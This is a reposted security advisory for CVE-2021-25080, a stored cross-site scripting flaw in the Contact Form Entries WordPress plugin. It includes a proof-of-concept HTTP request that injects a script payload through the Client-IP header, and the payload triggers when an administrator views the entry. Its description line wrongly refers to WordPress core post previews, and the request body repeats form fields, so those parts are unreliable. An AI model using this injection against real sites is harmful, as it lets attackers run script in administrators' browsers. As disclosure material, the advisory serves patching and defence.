Entri Formulir CRM WordPress, Skrip Lintas Situs

  • Whatsapp
Entri Formulir CRM WordPress, Skrip Lintas Situs
Entri Formulir CRM WordPress Skrip Lintas Situs

News.nextcloud.asia

Versi Entri Formulir CRM WordPress sebelum 1.1.7 tampaknya rentan terhadap kerentanan skrip lintas situs.

MD5 | f4e7025814603e6db8a25b7d889c817b

Hello, today I disclosed the CVE-2021-25080 vulnerability. Here attached
technical information:

# References:
* https://wpscan.com/vulnerability/acd3d98a-aab8-49be-b77e-e8c6ede171ac
*
https://secsi.io/blog/cve-2021-25080-finding-cross-site-scripting-vulnerabilities-in-headers/

# Description:
WordPress before 5.2.3 allows XSS in post previews by authenticated users.

# Technical Details and Exploitation:
CRM Form Entries CRM is vulnerable to a Stored XSS in Client IP field.
When the user uploads a new form, CRM Form Entries checks for the client IP
in order to save information about the user:
===============================================================================================================
public function get_ip(),
wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388
==============================================================================================================
The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is
stored inside the database.

# Proof Of Concept:

Suppose that you have a Contact Form, intercept the POST request and insert
the following Client-IP header
===============================================================================================================
POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback
HTTP/1.1
Host: dsp.com:11080
Content-Length: 1411
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ...
Client-IP: <img src=a onerror=alert(1)>

------WebKitFormBoundaryCuNGXLnhRsdglEAx

Content-Disposition: form-data; name="_wpcf7"

10
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"

5.3.1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"

en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"

wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"

Content-Disposition: form-data; name="_wpcf7"

10
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"

5.3.1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"

en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"

wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"
...
===============================================================================================================
The request is acccepted, and the code navigates the section
$_SERVER['HTTP_CLIENT_IP'] , ip is injected and saved inside the database.
When the administrator clicks on the entry element in the plugin, the XSS
is triggered.

# Solution:
Upgrade Contact Form Entries to version 1.1.7

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.